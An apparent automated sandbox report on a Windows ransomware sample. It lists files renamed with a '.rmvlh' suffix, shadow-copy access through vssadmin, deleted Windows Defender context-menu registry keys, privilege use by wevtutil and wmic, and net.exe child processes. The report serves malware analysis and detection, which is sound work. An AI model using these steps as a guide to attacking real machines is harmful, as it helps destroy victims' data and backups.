File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_Njx9522DVlY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ke_60x42.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\ui-strings.js.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_33t0wcfeOus0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_zHEWSHytxmo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\RunningLate.scale-64.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_veu6T6qB4kg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2210_40x40x32.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_LiwbMtrgJmY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\freecell\Guard_Duty_.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Pyramid\ResPacks\gameplaypyramid.respack C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_10h.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_13d.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageMedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\Assets\Logo.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_a5PwXJHytc40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b__kMBByDp7To0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\11891_40x40x32.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_OwNPTWV5HhE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\ui-strings.js.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_Do0BQnJKJTM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_qMYbTv12JwY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_lbwIfaVmL7Q0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio_Model_CX.winmd C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-print.xml_hidden.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_ZJTnCaK9Atc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Arrow.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_bCox2x1gAr00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_OKVYHRLKHWU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\No Symbol.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7357_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\support.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-300.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OneConnectAppList.targetsize-32.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_Phg1AoZ7ErA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\CIEXYZ.pf.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_QbPhSxl33U00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_5iwjUN8kvpM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\config.lua C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-colorize.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-72_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_LCk63Q36e7U0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_contrast-white.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_7xKpDpGegtI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3052 wrote to memory of 3212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3052 wrote to memory of 3212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3052 wrote to memory of 3212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4088 wrote to memory of 4000 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4088 wrote to memory of 4000 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4088 wrote to memory of 4000 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4312 wrote to memory of 4260 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4312 wrote to memory of 4260 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4312 wrote to memory of 4260 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4232 wrote to memory of 4368 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4232 wrote to memory of 4368 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4232 wrote to memory of 4368 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4416 wrote to memory of 4348 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4416 wrote to memory of 4348 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4416 wrote to memory of 4348 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4308 wrote to memory of 4392 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4308 wrote to memory of 4392 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4308 wrote to memory of 4392 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
